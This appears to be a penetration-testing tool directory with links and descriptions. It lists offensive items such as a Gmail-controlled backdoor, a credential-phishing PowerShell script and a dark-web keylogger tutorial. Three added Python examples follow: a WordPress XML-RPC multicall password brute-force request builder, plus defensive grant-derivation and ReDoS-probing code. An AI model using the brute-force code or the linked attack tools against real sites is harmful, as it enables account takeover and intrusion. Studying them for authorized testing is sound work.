Tools

Note: some tools that are relevant to a specific topic are listed under that topic rather than here.

  1. Yersinia – layer 2 attack tool for protocols such as STP, CDP, DTP, DHCP, HSRP, etc. Built into Kali.
    1. https://github.com/tomac/yersinia
    2. http://www.yersinia.net/
    3. http://tools.kali.org/vulnerability-analysis/yersinia
  2. pinfinder – Recovers the restrictions passcode on iOS devices from an iTunes backup
    1. https://github.com/gwatts/pinfinder
  3. XXEinjector – tool for automatic exploitation of XXE vulnerabilities, using direct retrieval as well as several out-of-band methods
    1. https://github.com/enjoiz/XXEinjector
  4. HostileSubBruteforcer – brute-forces DNS subdomains and reports where each one points, flagging subdomains that resolve to third-party hosting (S3, GitHub Pages, Heroku, etc.) that may be unclaimed and therefore candidates for subdomain takeover
    1. https://github.com/nahamsec/HostileSubBruteforcer
  5. wp-bruteforcer – a simple PHP CLI tool / library to brute-force WordPress logins over XML-RPC using system.multicall amplification: many wp.getUsersBlogs login attempts are packed into a single HTTP request, so one request tests many passwords
    1. https://github.com/arall/wp-bruteforcer
  6. PGPCrack-NG – program designed to brute-force symmetrically encrypted PGP files. It is a replacement for the long-dead PGPCrack.
    1. https://github.com/kholia/PGPCrack-NG
  7. Pixie-WPS – an offline WPS PIN recovery utility implementing the "pixie dust" attack, which exploits the weak nonce generation of some routers' WPS implementations; it works from the values captured during a single WPS exchange rather than by online guessing
    1. https://github.com/wiire/pixiewps
  8. SIMBL + method swizzling – cracking an Objective-C app without modifying its binary: SIMBL injects a bundle into the application while it loads, and method swizzling then replaces the implementations of selected methods at runtime
    1. https://github.com/Fuzion24/OSX_Swizzler
  9. JexBoss – tool for testing and exploiting vulnerabilities in JBoss Application Server
    1. https://github.com/joaomatosf/jexboss
  10. USB-Rubber-Ducky – the USB Rubber Ducky is a Human Interface Device (it enumerates as a keyboard) programmable with a simple scripting language, allowing penetration testers to quickly craft and deploy security auditing payloads that mimic human keyboard input
    1. https://github.com/hak5darren/USB-Rubber-Ducky
    2. big list of available payloads:
      https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
  11. skipfish – an old (no longer maintained) web security scanner from Google, but its design and its list of checks are still worth knowing.
    Advantages, as described by its documentation, include:
    * High performance: 500+ requests per second against responsive Internet
    targets, 2000+ requests per second on LAN / MAN networks, and 7000+ requests
    against local instances have been observed, with a very modest CPU, network,
    and memory footprint. This can be attributed to:
      * A multiplexing single-thread, fully asynchronous network I/O and data
      processing model that eliminates the memory management, scheduling, and IPC
      inefficiencies present in some multi-threaded clients.
      * Advanced HTTP/1.1 features such as range requests, content compression,
      and keep-alive connections, as well as forced response size limiting, to
      keep network-level overhead in check.
      * Smart response caching and advanced server behavior heuristics that
      minimize unnecessary traffic.
      * A performance-oriented, pure C implementation, including a custom
      HTTP stack.

    The list of security checks offered by the tool, outlined below, also doubles as a checklist of things to look for in a web pentest:

    * High risk flaws (potentially leading to system compromise):
      * Server-side query injection (including blind vectors, numerical parameters).
      * Explicit SQL-like syntax in GET or POST parameters.
      * Server-side shell command injection (including blind vectors).
      * Server-side XML / XPath injection (including blind vectors).
      * Format string vulnerabilities.
      * Integer overflow vulnerabilities.
      * Locations accepting HTTP PUT.

    * Medium risk flaws (potentially leading to data compromise):
      * Stored and reflected XSS vectors in document body (minimal JS XSS support).
      * Stored and reflected XSS vectors via HTTP redirects.
      * Stored and reflected XSS vectors via HTTP header splitting.
      * Directory traversal / LFI / RFI (including constrained vectors).
      * Assorted file POIs (server-side sources, configs, etc).
      * Attacker-supplied script and CSS inclusion vectors (stored and reflected).
      * External untrusted script and CSS inclusion vectors.
      * Mixed content problems on script and CSS resources (optional).
      * Password forms submitting from or to non-SSL pages (optional).
      * Incorrect or missing MIME types on renderables.
      * Generic MIME types on renderables.
      * Incorrect or missing charsets on renderables.
      * Conflicting MIME / charset info on renderables.
      * Bad caching directives on cookie setting responses.

    * Low risk issues (limited impact or low specificity):
      * Directory listing bypass vectors.
      * Redirection to attacker-supplied URLs (stored and reflected).
      * Attacker-supplied embedded content (stored and reflected).
      * External untrusted embedded content.
      * Mixed content on non-scriptable subresources (optional).
      * HTTPS -> HTTP submission of HTML forms (optional).
      * HTTP credentials in URLs.
      * Expired or not-yet-valid SSL certificates.
      * HTML forms with no XSRF protection.
      * Self-signed SSL certificates.
      * SSL certificate host name mismatches.
      * Bad caching directives on less sensitive content.

    * Internal warnings:
      * Failed resource fetch attempts.
      * Exceeded crawl limits.
      * Failed 404 behavior checks.
      * IPS filtering detected.
      * Unexpected response variations.
      * Seemingly misclassified crawl nodes.

    * Non-specific informational entries:
      * General SSL certificate information.
      * Significantly changing HTTP cookies.
      * Changing Server, Via, or X-… headers.
      * New 404 signatures.
      * Resources that cannot be accessed.
      * Resources requiring HTTP authentication.
      * Broken links.
      * Server errors.
      * All external links not classified otherwise (optional).
      * All external e-mails (optional).
      * All external URL redirectors (optional).
      * Links to unknown protocols.
      * Form fields that could not be autocompleted.
      * Password entry forms (for external brute-force).
      * File upload forms.
      * Other HTML forms (not classified otherwise).
      * Numerical file names (for external brute-force).
      * User-supplied links otherwise rendered on a page.
      * Incorrect or missing MIME type on less significant content.
      * Generic MIME type on less significant content.
      * Incorrect or missing charset on less significant content.
      * Conflicting MIME / charset information on less significant content.
      * OGNL-like parameter passing conventions.

    Along with a list of identified issues, skipfish also provides summary
    overviews of document types and issue types found, and an interactive
    sitemap, with nodes discovered through brute-force denoted in a distinctive
    way.

    NOTE: as a conscious design decision, skipfish will not redundantly complain
    about highly non-specific issues, including but not limited to:

    * Non-httponly or non-secure cookies,
    * Non-HTTPS or autocomplete-enabled forms,
    * HTML comments detected on a page,
    * Filesystem path disclosure in error messages,
    * Server or framework version disclosure,
    * Servers supporting TRACE or OPTIONS requests,
    * Mere presence of certain technologies, such as WebDAV.

    https://github.com/firebitsbr/skipfish

  12. TagCube – Web security scanner
    1. https://www.tagcube.io/
    2. CLI to launch web application security scans using TagCube’s REST API – https://github.com/tagcubeio/tagcube-cli
  13. Shell In A Box – implements a web server that can export arbitrary command line tools to a web based terminal emulator. The emulator is accessible from any JavaScript and CSS enabled web browser and does not require any additional browser plugins. Most typically, login shells would be exported this way:
    shellinaboxd -s /:LOGIN
    This command starts a web server at http://localhost:4200 that allows users to log in with their username and password and get access to their login shell. All client-server communications are encrypted if SSL/TLS certificates have been installed; if you run it without TLS (e.g. with --disable-ssl), the password and the whole shell session travel in clear text, so never expose such an instance beyond localhost.

    1. https://code.google.com/p/shellinabox/
  14. AVulnerabilityChecker – tool to check whether your computer is likely vulnerable to the "constant RWX address" issue in anti-virus products: several AV products allocate Read-Write-Execute memory at a predictable address inside every process, which hands an attacker a known executable region and undermines the OS mitigations (ASLR/DEP) that exploits would otherwise have to bypass
    1. anti-virus products allocate memory with RWX permissions at a predictable address http://breakingmalware.com/vulnerabilities/sedating-watchdog-abusing-security-products-bypass-mitigations/
    2. The tool – https://github.com/BreakingMalware/AVulnerabilityChecker
  15. Snyk – helps you find and fix known vulnerabilities in your Node.js dependencies
    1. https://github.com/Snyk/snyk
    2. vulnerability database used by Snyk https://github.com/Snyk/vulndb
  16. Hook Analyser – malware analysis and cyber threat intelligence software
    1. http://www.hookanalyser.com/2015/07/hook-analyser-32-major-release.html
  17. gcat – A fully featured backdoor that uses Gmail as a C&C server
    1. https://github.com/byt3bl33d3r/gcat
  18. HawkEye – .NET runtime object editor; lets you inspect and modify the objects of a .NET program while it runs. Note: the link below points to an unrelated Minecraft server plugin that happens to share the name; the .NET tool was hosted on CodePlex (hawkeye.codeplex.com).
    1. http://dev.bukkit.org/bukkit-plugins/hawkeye/
  19. JavaSnoop – like HawkEye but for Java. It does not let you change GUI objects directly; instead it lets you hook methods and execute code that changes them. This difference stems from how the JVM differs from the .NET CLR.
    1. https://code.google.com/p/javasnoop/
    2. https://vimeo.com/19051012
  20. ReFrameworker – like JavaSnoop but for Android: it hooks the Android Java framework itself. It is open source and ships inside the AppUse Android pentesting VM.
    1. https://appsec-labs.com/Managed_Code_Rootkits/
  21. Hardware keyloggers – a dark web tutorial and a commercial vendor
    1. http://genesisktrk2q3ud.onion.city/index.php?topic=90.msg194
    2. https://www.keelog.com/
  22. Phishing PowerShell script (Invoke-LoginPrompt) – pops up a native Windows credential prompt and captures the password the current user types into it; as the post's title says, if you want the credentials, just ask
    1. https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
    2. https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1
  23. Blackbone – Windows memory hacking library
    1. https://github.com/DarthTon/Blackbone
  24. Scripts to reset the krbtgt account password and related keys, which limits the lifetime of golden tickets forged with the stolen key. Caveat: the KDC still honours tickets signed with the previous krbtgt key (one generation of password history), so the reset must be done twice, with time for AD replication in between, before an existing golden ticket actually stops working.
    1. http://blogs.microsoft.com/cybertrust/2015/02/11/krbtgt-account-password-reset-scripts-now-available-for-customers/
    2. https://gist.githubusercontent.com/mubix/fd0c89ec021f70023695/raw/02e3f0df13aa86da41f1587ad798ad3c5e7b3711/Reset-KrbtgtKeyInteractive.ps1
    3. http://www.reddit.com/r/netsec/comments/2vtn42/krbtgt_account_password_reset_scripts_now/
  25. SqlPerms – simple command line tool that monitors a Microsoft SQL Server for a period of query activity and then returns the smallest set of permissions necessary to execute all of the monitored queries (a practical way to derive least-privilege grants for an application account)
    1. https://github.com/iSECPartners/sqlperms
    2. https://isecpartners.github.io/tools/2015/02/09/sqlperms.html
  26. Attack Surface Analyzer – helps you understand the changes in a Windows system's attack surface resulting from the installation of an application. The tool takes a "snapshot" of a range of security related information on the system (services, listening ports, ACLs, registry entries and so on); after the system changes you take another snapshot, and the tool compares the before and after snapshots and shows what changed in an HTML report.
    1. http://blogs.microsoft.com/cybertrust/2012/08/02/microsofts-free-security-tools-attack-surface-analyzer/
  27. SDL Regex Fuzzer – tests a regular expression for ReDoS (regular expression denial of service): it generates inputs that trigger catastrophic backtracking so that matching time explodes with input length
    1. http://blogs.microsoft.com/cybertrust/2010/10/12/new-tool-sdl-regex-fuzzer/
    2. https://www.microsoft.com/en-us/download/details.aspx?id=20095
  28. SharePoint Configuration Analyzer
    1. https://technet.microsoft.com/en-us/library/cc288082(v=office.12).aspx
    2. http://www.foxtoo.com/Windows/download-SharePoint-Security-Analyzer-10629102.htm
  29. Acunetix – website vulnerability scanner
    1. http://www.acunetix.com/vulnerability-scanner/
  30. Evil Foca – Windows tool for IPv4 and IPv6 MITM (ARP spoofing, DHCP ACK injection, SLAAC and neighbor advertisement spoofing), DoS and DNS hijacking attacks on the local network
    1. https://www.elevenpaths.com/labstools/evil-foca/index.html
  31. revtan – PHP dork scanner, distributed as a password-protected zip from a file-hosting site (password: hocib0.blogspot.com); treat it as an untrusted binary and run it only in an isolated VM
    1. http://www.mediafire.com/download/g6guyxdosxr5ofj/toolrevtan.zip
  32. Gr3eNoX-Exploit-Scanner – dork-based exploit scanner, again an untrusted download from a file-sharing site, so run it only in an isolated VM
    1. https://hostr.co/kX3lVjuVOOmd
  33. GooDork – command line google dorking tool
    1. https://github.com/k3170makan/GooDork
  34. BinGoo – scan website using google dorks and other techniques and also allows exploiting the vulnerabilities found
    1. https://github.com/Hood3dRob1n/BinGoo
  35. xcodescanner – website vulnerability scanner
    1. http://sourceforge.net/projects/xcodescanner/
  36. Online scanners (note that these hand the target to a third party, so only use them against hosts you are allowed to expose):
    1. GamaSec website scanner, includes one free trial scan
      1. https://www.gamasec.com/gsf/FreeTrial.aspx
    2. XSS and SQLi scanner
      1. http://find-xss.net/scanner/?l=en
    3. Port scanner
      1. https://hackertarget.com/nmap-online-port-scanner/
    4. Website scanner
      1. https://www.punkspider.org/
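The XML-RPC amplification that item 5 (wp-bruteforcer) relies on, as an added example written for this page (it is not wp-bruteforcer's own code). It builds one system.multicall request that bundles a wp.getUsersBlogs login attempt per candidate password, and maps a multicall response back to the passwords that produced each sub-result. Everything runs offline: the response is a constructed sample, and no request is sent anywhere.

```python
"""Added example: WordPress XML-RPC system.multicall amplification (offline).

One POST to /xmlrpc.php carries many wp.getUsersBlogs calls, each with a
different password, so a single HTTP request makes the server check N
passwords. Nothing here touches the network; the server response below is
constructed locally to show how results are mapped back to passwords.
"""
import xmlrpc.client


def build_multicall(username, passwords):
    """Return the XML body of one system.multicall request that bundles one
    wp.getUsersBlogs login attempt per candidate password."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]}
             for pw in passwords]
    # dumps() wants a tuple of params; the single param is the array of calls
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(passwords, response_xml):
    """Return the passwords whose sub-call did not fail.

    Each element of a multicall result is either a one-element list holding
    the method's return value (login succeeded) or a struct with
    faultCode/faultString (e.g. 403 "Incorrect username or password.").
    """
    (results,), _method = xmlrpc.client.loads(response_xml)
    if len(results) != len(passwords):
        # A server that aborts the multicall early (or a WAF) breaks the
        # index mapping; refuse to guess which password matched which result.
        raise ValueError("got %d results for %d calls" % (len(results), len(passwords)))
    hits = []
    for pw, res in zip(passwords, results):
        if isinstance(res, dict) and "faultCode" in res:
            continue
        hits.append(pw)
    return hits


# Constructed sample response (hypothetical): two failures, then a success
# for the third candidate. Built with the same library that parses it.
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    ([{"faultCode": 403, "faultString": "Incorrect username or password."},
      {"faultCode": 403, "faultString": "Incorrect username or password."},
      [[{"blogid": "1", "blogName": "demo", "isAdmin": True}]]],),
    methodresponse=True)


if __name__ == "__main__":
    candidates = ["admin", "password", "letmein"]
    print(build_multicall("admin", candidates))
    print("valid:", parse_multicall(candidates, SAMPLE_RESPONSE))
```

On the defensive side, the amplification only works while system.multicall is exposed: a plugin can remove it through the xmlrpc_methods filter, many hosts block /xmlrpc.php entirely, and recent WordPress versions stop evaluating further credentials inside a multicall once one login has failed, which is exactly the early-abort case the length check above refuses to misinterpret.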
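The least-privilege idea behind item 25 (SqlPerms), as an added example for this page rather than SqlPerms' own code: given statements captured while an application ran, derive the smallest set of object permissions that still lets every statement execute, and emit the matching GRANTs. The trace below is constructed sample input; the parsing is deliberately simple (schema.object names after the keyword, no aliases or subqueries), and the principal name app_role is a placeholder.

```python
"""Added example: derive least-privilege SQL Server grants from observed
statements, in the spirit of SqlPerms (not its code).

The sample trace is constructed; a real run would take the statements from
a SQL Server trace of the application's activity.
"""
import re
from collections import defaultdict

# An object name: bare, [bracketed], or dotted (schema.object). Simplified
# on purpose: aliases, subqueries and table-valued functions are not parsed.
_OBJ = r"((?:\[[^\]]+\]|\w+)(?:\.(?:\[[^\]]+\]|\w+))*)"
_FROM_OR_JOIN = re.compile(r"\b(?:FROM|JOIN)\s+" + _OBJ, re.I)
_INSERT = re.compile(r"^\s*INSERT\s+(?:INTO\s+)?" + _OBJ, re.I)
_UPDATE = re.compile(r"^\s*UPDATE\s+" + _OBJ, re.I)
_DELETE = re.compile(r"^\s*DELETE\s+(?:FROM\s+)?" + _OBJ, re.I)
_EXEC = re.compile(r"^\s*EXEC(?:UTE)?\s+" + _OBJ, re.I)
_WHERE = re.compile(r"\bWHERE\b", re.I)


def required_permissions(statements):
    """Return {object: set(permission)} needed to run every statement."""
    perms = defaultdict(set)
    for stmt in statements:
        head = stmt.lstrip().split(None, 1)[0].upper()
        if head == "SELECT":
            for obj in _FROM_OR_JOIN.findall(stmt):
                perms[obj].add("SELECT")
        elif head == "INSERT":
            perms[_INSERT.match(stmt).group(1)].add("INSERT")
            for obj in _FROM_OR_JOIN.findall(stmt):   # INSERT ... SELECT
                perms[obj].add("SELECT")
        elif head in ("UPDATE", "DELETE"):
            rx = _UPDATE if head == "UPDATE" else _DELETE
            target = rx.match(stmt).group(1)
            perms[target].add(head)
            # SQL Server also requires SELECT on the target when the
            # statement has a WHERE clause (it reads rows to pick them).
            if _WHERE.search(stmt):
                perms[target].add("SELECT")
            for obj in _FROM_OR_JOIN.findall(stmt):   # UPDATE ... FROM / joins
                if obj != target:
                    perms[obj].add("SELECT")
        elif head in ("EXEC", "EXECUTE"):
            perms[_EXEC.match(stmt).group(1)].add("EXECUTE")
        else:
            raise ValueError("unsupported statement: %r" % stmt)
    return dict(perms)


def grant_script(perms, principal):
    """Render the permission map as GRANT statements, one per object/permission."""
    lines = []
    for obj in sorted(perms):
        for p in sorted(perms[obj]):
            lines.append("GRANT %s ON %s TO %s;" % (p, obj, principal))
    return "\n".join(lines)


# Constructed sample trace (hypothetical schema and procedure names).
SAMPLE_TRACE = [
    "SELECT o.id, c.name FROM dbo.Orders AS o "
    "JOIN dbo.Customers AS c ON c.id = o.customer_id WHERE o.status = 'open'",
    "INSERT INTO dbo.AuditLog (actor, action) VALUES (@u, 'view')",
    "UPDATE dbo.Orders SET status = 'shipped' WHERE id = @id",
    "EXEC dbo.usp_RecalcTotals @id",
]


if __name__ == "__main__":
    print(grant_script(required_permissions(SAMPLE_TRACE), "app_role"))
```

The payoff is visible in the output: the application account needs no db_datawriter or db_owner membership, just SELECT on two tables, INSERT on one, UPDATE on one and EXECUTE on one procedure. The UPDATE-with-WHERE rule is the kind of detail that an observed-activity approach catches and a hand-written grant list often misses.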
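A black-box ReDoS probe in the spirit of item 27 (SDL Regex Fuzzer), added here as an example for this page and not Microsoft's code. It feeds a pattern inputs of growing length built from a repeated "pump" string plus a suffix that forces the match to fail, and reports the length at which matching blows past a time budget; exponential backtracking shows up as a sudden jump, while a linear pattern never trips. The pump and suffix defaults ("a" and "!") are assumptions that suit the classic patterns below; a fuller fuzzer would derive them from the pattern's own literals.

```python
"""Added example: timing-based ReDoS probe (not SDL Regex Fuzzer's code).

Python's re engine backtracks, so a pattern such as (a+)+$ takes time
exponential in the input length when the match is forced to fail.
"""
import re
import time


def probe_redos(pattern, pump="a", suffix="!", budget_s=0.25, min_len=4, max_len=28):
    """Return (length, seconds) for the first probe that exceeds budget_s,
    or None if every length up to max_len matched within the budget.

    The suffix must make the overall match fail: it is the failed match
    that forces the engine to explore every way of splitting the pumps.
    """
    compiled = re.compile(pattern)
    for n in range(min_len, max_len + 1):
        text = pump * n + suffix
        start = time.perf_counter()
        compiled.match(text)
        elapsed = time.perf_counter() - start
        if elapsed > budget_s:
            return n, elapsed
    return None


def is_redos_vulnerable(pattern, **kwargs):
    """True when the probe tripped the budget before reaching max_len."""
    return probe_redos(pattern, **kwargs) is not None


if __name__ == "__main__":
    # Classic catastrophic patterns beside a linear rewrite of the first.
    for pat in (r"(a+)+$", r"^(\w+\s?)*$", r"a+$"):
        hit = probe_redos(pat)
        if hit:
            print("%-14s VULNERABLE: %.2fs at length %d" % (pat, hit[1], hit[0]))
        else:
            print("%-14s ok up to length 28" % pat)
```

Because the probe stops at the first length that exceeds the budget and each step roughly doubles the cost, the total run time stays at a small multiple of the budget even for a vulnerable pattern. Treat a "ok" result as evidence, not proof: it only covers the pump/suffix shapes you tried, which is why the real fuzzer generates many input shapes.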